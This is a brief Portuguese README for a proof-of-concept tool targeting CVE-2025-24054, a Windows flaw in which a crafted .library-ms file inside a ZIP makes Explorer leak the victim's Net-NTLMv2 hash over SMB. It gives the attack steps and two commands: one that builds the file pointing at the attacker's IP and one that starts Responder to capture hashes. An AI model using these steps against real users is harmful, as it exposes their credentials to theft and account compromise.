
Uma simples Prova de Conceito para CVE-2025-24054 – Vulnerabilidade de Divulgação de Hash NTLM do Windows Library (.library-ms).
⚠️ Apenas para Uso Educacional e em Laboratório Autorizado
CVE-2025-24054 permite que um atacante force um sistema Windows a vazar o hash Net-NTLMv2 da vítima usando um arquivo .library-ms especialmente criado.
Quando a vítima extrai um ZIP contendo o arquivo .library-ms malicioso, o Windows Explorer inicia automaticamente uma conexão SMB, vazando o hash NTLM.
.library-ms malicioso contendo um caminho UNC apontando para sua máquina.
python poc.py -i YOUR-IP
sudo responder -I eth0